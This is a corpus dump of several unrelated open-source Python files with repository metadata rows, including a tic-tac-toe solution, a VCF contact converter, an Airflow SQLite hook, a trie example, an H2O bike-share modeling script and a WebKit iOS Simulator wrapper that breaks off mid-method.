    synth_data_B = [(2,[1,2,3,4,10,5,4,5,4]), (4,[10,10,6])]
    assert np.mean(timeseries_cross_entropy(synth_data_A, synth_data_B, get_lambdas=True, please_sanitize= False) ==
                   np.array([1., 1., 1., 5., 4., 3., 3., 2., 1., 1., 1., 2., 1., 2., 1., 4., 4.,
       3., 2., 4., 3., 2., 2., 2.])) == 1
# NOTE(review): "__main__" is just an ordinary function with a dunder-style
# name (not the module attribute); it is invoked unconditionally afterwards.
def __main__():
    test_self_entropy()
    print("SelfEntropy working. (Should be 1.83)")
    test_cross_entropy()
    print("CrossEntropy working.")
    print("""I don't have test cases from predictability yet. 
    But really, sometimes you have to live little dangerously.""")
__main__() | [
"tobin.south@gmail.com"
] | tobin.south@gmail.com |
d27b73807835afcd3d5ac7165b6fb8e9fd049a0c | 6fa6288bd21694bb144798d63b77a8e2924603e5 | /DataStructures/designs/desgin_tic_tac_toe.py | cda2095d7f338e82a64fc50c03ee2c3d3b6f7b1f | [] | no_license | akshatakulkarni98/ProblemSolving | 649ecd47cec0a29ccff60edb60f3456bf982c4a1 | 6765dbbde41cfc5ee799193bbbdfb1565eb6a5f5 | refs/heads/master | 2023-01-03T19:03:49.249794 | 2020-10-27T06:28:02 | 2020-10-27T06:28:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,391 | py | # https://leetcode.com/problems/design-tic-tac-toe/
# TC: O(1)
# SC: O(N)
class TicTacToe:
    """n x n tic-tac-toe with O(1) win detection per move.

    Rather than storing the board, keep a running signed sum for every row,
    every column and both diagonals: player 1 contributes +1, player 2
    contributes -1.  A line whose sum reaches +n or -n is fully owned by a
    single player, who has therefore won.
    """
    def __init__(self, n: int):
        """Create the per-line counters for an n x n board."""
        self.rows = [0] * n
        self.cols = [0] * n
        self.prin_diag = 0
        self.sec_diag = 0
        self.n = n
    def move(self, row: int, col: int, player: int) -> int:
        """Record player's move at (row, col) and return 1/2 for a win, else 0."""
        delta = 1 if player == 1 else -1
        self.rows[row] += delta
        self.cols[col] += delta
        if row == col:
            self.prin_diag += delta
        if row + col == self.n - 1:
            self.sec_diag += delta
        # Only the lines touched by this move can have completed just now.
        touched = (self.rows[row], self.cols[col], self.prin_diag, self.sec_diag)
        if any(abs(total) == self.n for total in touched):
            return player
        return 0
# Your TicTacToe object will be instantiated and called as such:
# obj = TicTacToe(n)
# param_1 = obj.move(row,col,player)
| [
"noreply@github.com"
] | akshatakulkarni98.noreply@github.com |
8f178d02ad011b921b4130cb50f82470c3ed2dfa | 963625032645b4080c0c2606cc86391d0600e54c | /VCF-Converter.py | 5fd3d5bd33a0998b7b4cbc5c2fe1e352d353998a | [] | no_license | 3bdelrhmann/Save-Numbers-VCF | bb087257a227a607ecaca653c5411161f375e17c | 614f61fb082c8bdf34c2c6b204b7a325ae869347 | refs/heads/master | 2020-08-12T17:55:59.649210 | 2019-10-13T17:53:42 | 2019-10-13T17:53:42 | 214,814,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,087 | py | from random import randrange
# Prompt for the contact list's base name; "<name>.txt" is read by MainFunc.
# Re-ask until the name contains no extension (no '.' characters).
FileName = input(str('What is your file name :?: '))
while '.' in FileName:
    print("Please write file name without extention")
    FileName = input(str('What is your file name :?: '))
def MainFunc(ListFileName):
    """Convert "<ListFileName>.txt" (one phone number per line) to a vCard file.

    Every line becomes a VERSION 3.0 vCard whose display name is
    "<ListFileName>-<n>" and whose number is prefixed with "+2".  Output is
    written to "YourContants-<random>.VCF" in the current directory.  If the
    input file cannot be opened, the error is reported and nothing is written.
    """
    try:
        Mobile_List_File = open(ListFileName + ".txt", 'r')
    except OSError:
        # Bug fix: the original bare except fell through and then crashed
        # with a NameError on the unassigned file object; report and stop.
        print("Please check your file name,exist,..etc cannot opened this file")
        return
    OutoputFileName = 'YourContants-' + str(randrange(92399)) + '.VCF'
    # "with" closes both files even if a write fails (the original closed
    # them manually, leaking on error paths).
    with Mobile_List_File, open(OutoputFileName, 'w') as OutputFile:
        counter = 0
        for List_contents in Mobile_List_File:
            counter += 1
            OutputFile.write('BEGIN:VCARD\n')
            OutputFile.write('VERSION:3.0\n')
            OutputFile.write('FN:' + ListFileName + '-' + str(counter) + '\n')
            OutputFile.write('TEL:+2' + List_contents.strip() + '\n')
            OutputFile.write('END:VCARD' + '\n')
# Run the conversion for the name gathered above.
MainFunc(FileName)
| [
"abdelrhman_m@outlook.com"
] | abdelrhman_m@outlook.com |
59aec718fce53f6051be2ea2d5f6ec1380b3bfd2 | c7027edceeae907ce7d21112336e84f101eeb89b | /airflow/providers/sqlite/hooks/sqlite.py | 5a14249ca5902174edf5d6b29c533545cbd950d7 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | jao6693/airflow | 0a8027ce33e20ee8f6032facb1b8ab453c2d20d4 | 269b608246b015c55e6cae4ed0f50b1e2bb0fa95 | refs/heads/main | 2023-01-30T18:53:23.431745 | 2022-11-05T14:59:27 | 2022-11-05T14:59:27 | 320,338,180 | 0 | 0 | Apache-2.0 | 2020-12-10T17:08:36 | 2020-12-10T17:08:35 | null | UTF-8 | Python | false | false | 1,618 | py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sqlite3
from airflow.providers.common.sql.hooks.sql import DbApiHook
class SqliteHook(DbApiHook):
    """Airflow hook for talking to a SQLite database file."""
    conn_name_attr = 'sqlite_conn_id'
    default_conn_name = 'sqlite_default'
    conn_type = 'sqlite'
    hook_name = 'Sqlite'
    placeholder = '?'
    def get_conn(self) -> sqlite3.dbapi2.Connection:
        """Open and return a DB-API connection to the configured database file."""
        airflow_conn = self.get_connection(getattr(self, self.conn_name_attr))
        return sqlite3.connect(airflow_conn.host)
    def get_uri(self) -> str:
        """Build the SQLAlchemy-style URI consumed by get_sqlalchemy_engine()."""
        airflow_conn = self.get_connection(getattr(self, self.conn_name_attr))
        return f"sqlite:///{airflow_conn.host}"
| [
"fabien.beuret@delaware.pro"
] | fabien.beuret@delaware.pro |
c643c289d6a7b2f99414e9f9a7bb4a558e5ac8c3 | d79f3a31d173f18ec112c521acdcee8e8e73724d | /test5.py | 7cd08b85a12191df9c24b5d26bcedcd5412f72de | [] | no_license | k156/hello | 3de815de569b38f8260e774e57b138f4da43f480 | f5a7f386d3f78d15d7f166a95ad25724e168f472 | refs/heads/master | 2020-04-04T23:15:38.252126 | 2019-05-03T05:57:00 | 2019-05-03T05:57:00 | 156,352,395 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | from bs4 import BeautifulSoup
import requests
from time import sleep
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
}
url = "https://www.melon.com/chart/index.htm#params%5Bidx%5D=1/"
html = requests.get(url, headers = headers).text
soup = BeautifulSoup(html, 'html.parser')
trs = soup.select("tr#lst50")
for tr in trs:
tds = tr.select('td')
rank = tds[1].text
title = tds[4]
# singer =
# print(rank, title, type(title))
print(rank, title, type(title)) | [
"jm_91@live.co.kr"
] | jm_91@live.co.kr |
669262236461f63becc76d8b5f7e36e0ea7b5338 | 5166b9a3d04a74d664007315782a257bbec8226e | /test.py | 332337fdd2c92281d14b52d721e513e96581afe7 | [] | no_license | SergiuDeveloper/Lexical-Complexity---V3 | 23423291da74456525db0aa70b35f5f875f8a4ae | 86c02faf63bc5a8521bacce399b9ae75c737c95c | refs/heads/main | 2023-04-08T05:53:57.944274 | 2021-04-21T15:45:55 | 2021-04-21T15:45:55 | 357,539,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | from gensim.models.fasttext import FastText
from joblib import load
import sys
fasttext_mdl = FastText.load('models/FastText/model')
hgbr_mdl = load('models/HistGradientBoostingRegressor/model')
input_word = sys.argv[1].lower()
input_word_ngrams = fasttext_mdl.wv[input_word]
predicted_complexity = hgbr_mdl.predict([input_word_ngrams])[0]
print(predicted_complexity) | [
"sergiu.nistor@info.uaic.ro"
] | sergiu.nistor@info.uaic.ro |
b224e3cebfd3bb2602c4d7a2d4917aa1c84cf623 | d616dc1ef6fe075f15f2d83d8680dded8fecd35e | /example.py | 0f53a2dbd0bb07330f675f304753f0111bd31b28 | [
"Apache-2.0"
] | permissive | hellcoderz/pytrie | adb136aa1414c82d9a944e7a35d57c5060d0bf5e | 1cfc167c5201d855763714bd9f88e312e56402bd | refs/heads/master | 2020-04-01T23:03:49.833436 | 2014-02-03T11:07:34 | 2014-02-03T17:44:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,222 | py | #!/usr/bin/python
"""trie module example code."""
__author__ = 'Michal Nazarewicz <mina86@mina86.com>'
__copyright__ = 'Copyright 2014 Google Inc.'
import os
import stat
import sys
import trie
print 'Storing file information in the trie'
print '===================================='
print
ROOT_DIR = '/usr/local'
SUB_DIR = os.path.join(ROOT_DIR, 'lib')
SUB_DIRS = tuple(os.path.join(ROOT_DIR, d)
for d in ('lib', 'lib32', 'lib64', 'share'))
t = trie.StringTrie(separator=os.path.sep)
# Read sizes regular files into a Trie
for dirpath, unused_dirnames, filenames in os.walk(ROOT_DIR):
for filename in filenames:
filename = os.path.join(dirpath, filename)
try:
filestat = os.stat(filename)
except OSError:
continue
if stat.S_IFMT(filestat.st_mode) == stat.S_IFREG:
t[filename] = filestat.st_size
# Size of all files we've scanned
print 'Size of %s: %d' % (ROOT_DIR, sum(t.itervalues()))
# Size of all files of a sub-directory
print 'Size of %s: %d' % (SUB_DIR, sum(t.itervalues(prefix=SUB_DIR)))
# Check existence of some directories
for directory in SUB_DIRS:
print directory, 'exists' if t.has_subtrie(directory) else 'does not exist'
# Drop a subtrie
print 'Dropping', SUB_DIR
del t[SUB_DIR:]
print 'Size of %s: %d' % (ROOT_DIR, sum(t.itervalues()))
for directory in SUB_DIRS:
print directory, 'exists' if t.has_subtrie(directory) else 'does not exist'
print
print 'Storing URL handlers map'
print '========================'
print
t = trie.CharTrie()
t['/'] = lambda url: sys.stdout.write('Root handler: %s\n' % url)
t['/foo'] = lambda url: sys.stdout.write('Foo handler: %s\n' % url)
t['/foobar'] = lambda url: sys.stdout.write('FooBar handler: %s\n' % url)
t['/baz'] = lambda url: sys.stdout.write('Baz handler: %s\n' % url)
for url in ('/', '/foo', '/foot', '/foobar', 'invalid', '/foobarbaz', '/ba'):
handler = t.FindLongestPrefix(url)
if handler:
handler.value(url)
else:
print 'Unable to handle', repr(url)
if not os.isatty(0):
sys.exit(0)
try:
import termios
import tty
def getch():
attr = termios.tcgetattr(0)
try:
tty.setraw(0)
return sys.stdin.read(1)
finally:
termios.tcsetattr(0, termios.TCSADRAIN, attr)
except ImportError:
try:
from msvcrt import getch
except ImportError:
sys.exit(0)
print
print 'Dictionary test'
print '==============='
print
t = trie.CharTrie()
t['cat'] = True
t['caterpillar'] = True
t['car'] = True
t['bar'] = True
t['exit'] = False
print 'Start typing a word, "exit" to stop'
print '(Other words you might want to try: %s)' % ', '.join(sorted(
k for k in t if k != 'exit'))
print
text = ''
while True:
ch = getch()
if ord(ch) < 32:
print 'Exiting'
break
text += ch
value = t.get(text)
if value is False:
print 'Exiting'
break
if value is not None:
print repr(text), 'is a word'
if t.has_subtrie(text):
print repr(text), 'is a prefix of a word'
else:
print repr(text), 'is not a prefix, going back to empty string'
text = ''
| [
"mina86@mina86.com"
] | mina86@mina86.com |
0fdb15d008b4ea1de32bbfa7b86fb81240226cb8 | c96c77b9943fe884c63ea14b8dae233b6d4c5369 | /h2o-algos/src/test/java/hex/example/workflowtest.py | 75db4e4935720a83986f49c93b2f71db8af0026c | [
"Apache-2.0"
] | permissive | ChiahungTai/h2o-dev | c23b154b3ad54ccdd8eed652005a798c2fd89aec | f9f33ac3ba96e1b157caa7136286b749de3ba9d9 | refs/heads/master | 2021-01-18T07:48:35.665781 | 2015-02-07T01:19:08 | 2015-02-07T01:49:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,078 | py | import h2o
# Connect to a cluster
h2o.init()
# Pick either the big or the small demo.
# Big data is 10M rows
small_test = ["bigdata/laptop/citibike-nyc/2013-10.csv"]
big_test = ["bigdata/laptop/citibike-nyc/2013-07.csv",
"bigdata/laptop/citibike-nyc/2013-08.csv",
"bigdata/laptop/citibike-nyc/2013-09.csv",
"bigdata/laptop/citibike-nyc/2013-10.csv",
"bigdata/laptop/citibike-nyc/2013-11.csv",
"bigdata/laptop/citibike-nyc/2013-12.csv",
"bigdata/laptop/citibike-nyc/2014-01.csv",
"bigdata/laptop/citibike-nyc/2014-02.csv",
"bigdata/laptop/citibike-nyc/2014-03.csv",
"bigdata/laptop/citibike-nyc/2014-04.csv",
"bigdata/laptop/citibike-nyc/2014-05.csv",
"bigdata/laptop/citibike-nyc/2014-06.csv",
"bigdata/laptop/citibike-nyc/2014-07.csv",
"bigdata/laptop/citibike-nyc/2014-08.csv"]
# ----------
# 1- Load data
data = h2o.import_frame(path=big_test)
# ----------
# 2- light data munging
# Convert start time to: Day since the Epoch
startime = data["starttime"]
secsPerDay=1000*60*60*24
data["Days"] = (startime/secsPerDay).floor()
data.describe()
# Now do a monster Group-By. Count bike starts per-station per-day
ddplycols=["Days","start station name"]
bph = h2o.ddply(data[ddplycols],ddplycols,"(%nrow)")
bph["C1"]._name = "bikes"
bph["bikes"].quantile().show()
# A little feature engineering
# Add in month-of-year (seasonality; fewer bike rides in winter than summer)
secs = bph["Days"]*secsPerDay
bph["Month"] = secs.month()
# Add in day-of-week (work-week; more bike rides on Sunday than Monday)
bph["DayOfWeek"] = secs.dayOfWeek()
bph.describe()
# Test/train split
r = bph['Days'].runif()
train = bph[ r < 0.6 ]
test = bph[(0.6 <= r) & (r < 0.9)]
hold = bph[ 0.9 <= r ]
train.describe()
test .describe()
# ----------
# 3- build model on train; using test as validation
# Run GBM
gbm = h2o.gbm(x =train.drop("bikes"),
y =train ["bikes"],
validation_x=test .drop("bikes"),
validation_y=test ["bikes"],
ntrees=500, # 500 works well
max_depth=6,
min_rows=10,
nbins=20,
learn_rate=0.1)
#gbm.show()
# Run GLM
glm = h2o.glm(x =train.drop("bikes"),
y =train ["bikes"],
validation_x=test .drop("bikes"),
validation_y=test ["bikes"])
#glm.show()
# ----------
# 4- Score on holdout set & report
train_r2_gbm = gbm.model_performance(train).r2()
test_r2_gbm = gbm.model_performance(test ).r2()
hold_r2_gbm = gbm.model_performance(hold ).r2()
print "GBM R2 TRAIN=",train_r2_gbm,", R2 TEST=",test_r2_gbm,", R2 HOLDOUT=",hold_r2_gbm
train_r2_glm = glm.model_performance(train).r2()
test_r2_glm = glm.model_performance(test ).r2()
hold_r2_glm = glm.model_performance(hold ).r2()
print "GLM R2 TRAIN=",train_r2_glm,", R2 TEST=",test_r2_glm,", R2 HOLDOUT=",hold_r2_glm
| [
"cliffc@acm.org"
] | cliffc@acm.org |
8ee9c7efec2c921b88454de864a1af7b8fe6d6d5 | c831d5b1de47a062e1e25f3eb3087404b7680588 | /webkit/Tools/Scripts/webkitpy/xcode/simulator.py | 8af9add23fcd564619efa3a85604a9706e310311 | [] | no_license | naver/sling | 705b09c6bba6a5322e6478c8dc58bfdb0bfb560e | 5671cd445a2caae0b4dd0332299e4cfede05062c | refs/heads/master | 2023-08-24T15:50:41.690027 | 2016-12-20T17:19:13 | 2016-12-20T17:27:47 | 75,152,972 | 126 | 6 | null | 2022-10-31T00:25:34 | 2016-11-30T04:59:07 | C++ | UTF-8 | Python | false | false | 21,174 | py | # Copyright (C) 2014, 2015 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import itertools
import logging
import os
import plistlib
import re
import subprocess
import time
from webkitpy.benchmark_runner.utils import timeout
from webkitpy.common.host import Host
_log = logging.getLogger(__name__)
"""
Minimally wraps CoreSimulator functionality through simctl.
If possible, use real CoreSimulator.framework functionality by linking to the framework itself.
Do not use PyObjC to dlopen the framework.
"""
class DeviceType(object):
"""
Represents a CoreSimulator device type.
"""
def __init__(self, name, identifier):
"""
:param name: The device type's human-readable name
:type name: str
:param identifier: The CoreSimulator identifier.
:type identifier: str
"""
self.name = name
self.identifier = identifier
@classmethod
def from_name(cls, name):
"""
:param name: The name for the desired device type.
:type name: str
:returns: A `DeviceType` object with the specified identifier or throws a TypeError if it doesn't exist.
:rtype: DeviceType
"""
identifier = None
for device_type in Simulator().device_types:
if device_type.name == name:
identifier = device_type.identifier
break
if identifier is None:
raise TypeError('A device type with name "{name}" does not exist.'.format(name=name))
return DeviceType(name, identifier)
@classmethod
def from_identifier(cls, identifier):
"""
:param identifier: The CoreSimulator identifier for the desired runtime.
:type identifier: str
:returns: A `Runtime` object witht the specified identifier or throws a TypeError if it doesn't exist.
:rtype: DeviceType
"""
name = None
for device_type in Simulator().device_types:
if device_type.identifier == identifier:
name = device_type.name
break
if name is None:
raise TypeError('A device type with identifier "{identifier}" does not exist.'.format(
identifier=identifier))
return DeviceType(name, identifier)
def __eq__(self, other):
return (self.name == other.name) and (self.identifier == other.identifier)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '<DeviceType "{name}": {identifier}>'.format(name=self.name, identifier=self.identifier)
class Runtime(object):
"""
Represents a CoreSimulator runtime associated with an iOS SDK.
"""
def __init__(self, version, identifier, available, devices=None, is_internal_runtime=False):
"""
:param version: The iOS SDK version
:type version: tuple
:param identifier: The CoreSimulator runtime identifier
:type identifier: str
:param availability: Whether the runtime is available for use.
:type availability: bool
:param devices: A list of devices under this runtime
:type devices: list or None
:param is_internal_runtime: Whether the runtime is an Apple internal runtime
:type is_internal_runtime: bool
"""
self.version = version
self.identifier = identifier
self.available = available
self.devices = devices or []
self.is_internal_runtime = is_internal_runtime
@classmethod
def from_version_string(cls, version):
return cls.from_identifier('com.apple.CoreSimulator.SimRuntime.iOS-' + version.replace('.', '-'))
@classmethod
def from_identifier(cls, identifier):
"""
:param identifier: The identifier for the desired CoreSimulator runtime.
:type identifier: str
:returns: A `Runtime` object with the specified identifier or throws a TypeError if it doesn't exist.
:rtype: Runtime
"""
for runtime in Simulator().runtimes:
if runtime.identifier == identifier:
return runtime
raise TypeError('A runtime with identifier "{identifier}" does not exist.'.format(identifier=identifier))
def __eq__(self, other):
return (self.version == other.version) and (self.identifier == other.identifier) and (self.is_internal_runtime == other.is_internal_runtime)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
version_suffix = ""
if self.is_internal_runtime:
version_suffix = " Internal"
return '<Runtime {version}: {identifier}. Available: {available}, {num_devices} devices>'.format(
version='.'.join(map(str, self.version)) + version_suffix,
identifier=self.identifier,
available=self.available,
num_devices=len(self.devices))
class Device(object):
"""
Represents a CoreSimulator device underneath a runtime
"""
def __init__(self, name, udid, available, runtime):
"""
:param name: The device name
:type name: str
:param udid: The device UDID (a UUID string)
:type udid: str
:param available: Whether the device is available for use.
:type available: bool
:param runtime: The iOS Simulator runtime that hosts this device
:type runtime: Runtime
"""
self.name = name
self.udid = udid
self.available = available
self.runtime = runtime
@property
def state(self):
"""
:returns: The current state of the device.
:rtype: Simulator.DeviceState
"""
return Simulator.device_state(self.udid)
@property
def path(self):
"""
:returns: The filesystem path that contains the simulator device's data.
:rtype: str
"""
return Simulator.device_directory(self.udid)
@classmethod
def create(cls, name, device_type, runtime):
"""
Create a new CoreSimulator device.
:param name: The name of the device.
:type name: str
:param device_type: The CoreSimulatort device type.
:type device_type: DeviceType
:param runtime: The CoreSimualtor runtime.
:type runtime: Runtime
:return: The new device or raises a CalledProcessError if ``simctl create`` failed.
:rtype: Device
"""
device_udid = subprocess.check_output(['xcrun', 'simctl', 'create', name, device_type.identifier, runtime.identifier]).rstrip()
Simulator.wait_until_device_is_in_state(device_udid, Simulator.DeviceState.SHUTDOWN)
return Simulator().find_device_by_udid(device_udid)
@classmethod
def delete(cls, udid):
"""
Delete the given CoreSimulator device.
:param udid: The udid of the device.
:type udid: str
"""
subprocess.call(['xcrun', 'simctl', 'delete', udid])
def __eq__(self, other):
return self.udid == other.udid
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '<Device "{name}": {udid}. State: {state}. Runtime: {runtime}, Available: {available}>'.format(
name=self.name,
udid=self.udid,
state=self.state,
available=self.available,
runtime=self.runtime.identifier)
# FIXME: This class is fragile because it parses the output of the simctl command line utility, which may change.
# We should find a better way to query for simulator device state and capabilities. Maybe take a similiar
# approach as in webkitdirs.pm and utilize the parsed output from the device.plist files in the sub-
# directories of ~/Library/Developer/CoreSimulator/Devices?
# Also, simctl has the option to output in JSON format (xcrun simctl list --json).
class Simulator(object):
"""
Represents the iOS Simulator infrastructure under the currently select Xcode.app bundle.
"""
device_type_re = re.compile('(?P<name>[^(]+)\((?P<identifier>[^)]+)\)')
# FIXME: runtime_re parses the version from the runtime name, but that does not contain the full version number
# (it can omit the revision). We should instead parse the version from the number contained in parentheses.
runtime_re = re.compile(
'(i|watch|tv)OS (?P<version>\d+\.\d)(?P<internal> Internal)? \(\d+\.\d+(\.\d+)? - (?P<build_version>[^)]+)\) \((?P<identifier>[^)]+)\)( \((?P<availability>[^)]+)\))?')
unavailable_version_re = re.compile('-- Unavailable: (?P<identifier>[^ ]+) --')
version_re = re.compile('-- (i|watch|tv)OS (?P<version>\d+\.\d+)(?P<internal> Internal)? --')
devices_re = re.compile(
'\s*(?P<name>[^(]+ )\((?P<udid>[^)]+)\) \((?P<state>[^)]+)\)( \((?P<availability>[^)]+)\))?')
def __init__(self, host=None):
self._host = host or Host()
self.runtimes = []
self.device_types = []
self.refresh()
# Keep these constants synchronized with the SimDeviceState constants in CoreSimulator/SimDevice.h.
class DeviceState:
DOES_NOT_EXIST = -1
CREATING = 0
SHUTDOWN = 1
BOOTING = 2
BOOTED = 3
SHUTTING_DOWN = 4
@staticmethod
def wait_until_device_is_booted(udid, timeout_seconds=60 * 5):
Simulator.wait_until_device_is_in_state(udid, Simulator.DeviceState.BOOTED, timeout_seconds)
with timeout(seconds=timeout_seconds):
while True:
try:
state = subprocess.check_output(['xcrun', 'simctl', 'spawn', udid, 'launchctl', 'print', 'system']).strip()
if re.search("A[\s]+com.apple.springboard.services", state):
return
except subprocess.CalledProcessError:
if Simulator.device_state(udid) != Simulator.DeviceState.BOOTED:
raise RuntimeError('Simuator device quit unexpectedly.')
_log.warn("Error in checking Simulator boot status. Will retry in 1 second.")
time.sleep(1)
@staticmethod
def wait_until_device_is_in_state(udid, wait_until_state, timeout_seconds=60 * 5):
with timeout(seconds=timeout_seconds):
while (Simulator.device_state(udid) != wait_until_state):
time.sleep(0.5)
@staticmethod
def device_state(udid):
device_plist = os.path.join(Simulator.device_directory(udid), 'device.plist')
if not os.path.isfile(device_plist):
return Simulator.DeviceState.DOES_NOT_EXIST
return plistlib.readPlist(device_plist)['state']
@staticmethod
def device_directory(udid):
return os.path.realpath(os.path.expanduser(os.path.join('~/Library/Developer/CoreSimulator/Devices', udid)))
def delete_device(self, udid):
Simulator.wait_until_device_is_in_state(udid, Simulator.DeviceState.SHUTDOWN)
Device.delete(udid)
def refresh(self):
"""
Refresh runtime and device type information from ``simctl list``.
"""
lines = self._host.platform.xcode_simctl_list()
device_types_header = next(lines)
if device_types_header != '== Device Types ==':
raise RuntimeError('Expected == Device Types == header but got: "{}"'.format(device_types_header))
self._parse_device_types(lines)
def _parse_device_types(self, lines):
"""
Parse device types from ``simctl list``.
:param lines: A generator for the output lines from ``simctl list``.
:type lines: genexpr
:return: None
"""
for line in lines:
device_type_match = self.device_type_re.match(line)
if not device_type_match:
if line != '== Runtimes ==':
raise RuntimeError('Expected == Runtimes == header but got: "{}"'.format(line))
break
device_type = DeviceType(name=device_type_match.group('name').rstrip(),
identifier=device_type_match.group('identifier'))
self.device_types.append(device_type)
self._parse_runtimes(lines)
def _parse_runtimes(self, lines):
"""
Continue to parse runtimes from ``simctl list``.
:param lines: A generator for the output lines from ``simctl list``.
:type lines: genexpr
:return: None
"""
for line in lines:
runtime_match = self.runtime_re.match(line)
if not runtime_match:
if line != '== Devices ==':
raise RuntimeError('Expected == Devices == header but got: "{}"'.format(line))
break
version = tuple(map(int, runtime_match.group('version').split('.')))
runtime = Runtime(version=version,
identifier=runtime_match.group('identifier'),
available=runtime_match.group('availability') is None,
is_internal_runtime=bool(runtime_match.group('internal')))
self.runtimes.append(runtime)
self._parse_devices(lines)
def _parse_devices(self, lines):
"""
Continue to parse devices from ``simctl list``.
:param lines: A generator for the output lines from ``simctl list``.
:type lines: genexpr
:return: None
"""
current_runtime = None
for line in lines:
version_match = self.version_re.match(line)
if version_match:
version = tuple(map(int, version_match.group('version').split('.')))
current_runtime = self.runtime(version=version, is_internal_runtime=bool(version_match.group('internal')))
assert current_runtime
continue
unavailable_version_match = self.unavailable_version_re.match(line)
if unavailable_version_match:
current_runtime = None
continue
device_match = self.devices_re.match(line)
if not device_match:
if line != '== Device Pairs ==':
raise RuntimeError('Expected == Device Pairs == header but got: "{}"'.format(line))
break
if current_runtime:
device = Device(name=device_match.group('name').rstrip(),
udid=device_match.group('udid'),
available=device_match.group('availability') is None,
runtime=current_runtime)
current_runtime.devices.append(device)
def device_type(self, name=None, identifier=None):
"""
:param name: The short name of the device type.
:type name: str
:param identifier: The CoreSimulator identifier of the desired device type.
:type identifier: str
:return: A device type with the specified name and/or identifier, or None if one doesn't exist as such.
:rtype: DeviceType
"""
for device_type in self.device_types:
if name and device_type.name != name:
continue
if identifier and device_type.identifier != identifier:
continue
return device_type
return None
def runtime(self, version=None, identifier=None, is_internal_runtime=None):
"""
:param version: The iOS version of the desired runtime.
:type version: tuple
:param identifier: The CoreSimulator identifier of the desired runtime.
:type identifier: str
:return: A runtime with the specified version and/or identifier, or None if one doesn't exist as such.
:rtype: Runtime or None
"""
if version is None and identifier is None:
raise TypeError('Must supply version and/or identifier.')
for runtime in self.runtimes:
if version and runtime.version != version:
continue
if is_internal_runtime and runtime.is_internal_runtime != is_internal_runtime:
continue
if identifier and runtime.identifier != identifier:
continue
return runtime
return None
def find_device_by_udid(self, udid):
"""
:param udid: The UDID of the device to find.
:type udid: str
:return: The `Device` with the specified UDID.
:rtype: Device
"""
for device in self.devices:
if device.udid == udid:
return device
return None
# FIXME: We should find an existing device with respect to its name, device type and runtime.
def device(self, name=None, runtime=None, should_ignore_unavailable_devices=False):
"""
:param name: The name of the desired device.
:type name: str
:param runtime: The runtime of the desired device.
:type runtime: Runtime
:return: A device with the specified name and/or runtime, or None if one doesn't exist as such
:rtype: Device or None
"""
if name is None and runtime is None:
raise TypeError('Must supply name and/or runtime.')
for device in self.devices:
if should_ignore_unavailable_devices and not device.available:
continue
if name and device.name != name:
continue
if runtime and device.runtime != runtime:
continue
return device
return None
@property
def available_runtimes(self):
"""
:return: An iterator of all available runtimes.
:rtype: iter
"""
return itertools.ifilter(lambda runtime: runtime.available, self.runtimes)
@property
def devices(self):
"""
:return: An iterator of all devices from all runtimes.
:rtype: iter
"""
return itertools.chain(*[runtime.devices for runtime in self.runtimes])
@property
def latest_available_runtime(self):
"""
:return: Returns a Runtime object with the highest version.
:rtype: Runtime or None
"""
if not self.runtimes:
return None
return sorted(self.available_runtimes, key=lambda runtime: runtime.version, reverse=True)[0]
def lookup_or_create_device(self, name, device_type, runtime):
"""
Returns an available iOS Simulator device for testing.
This function will create a new simulator device with the specified name,
device type and runtime if one does not already exist.
:param name: The name of the simulator device to lookup or create.
:type name: str
:param device_type: The CoreSimulator device type.
:type device_type: DeviceType
:param runtime: The CoreSimulator runtime.
:type runtime: Runtime
:return: A dictionary describing the device.
:rtype: Device
"""
assert(runtime.available)
testing_device = self.device(name=name, runtime=runtime, should_ignore_unavailable_devices=True)
if testing_device:
return testing_device
testing_device = Device.create(name, device_type, runtime)
assert(testing_device.available)
return testing_device
def __repr__(self):
return '<iOS Simulator: {num_runtimes} runtimes, {num_device_types} device types>'.format(
num_runtimes=len(self.runtimes),
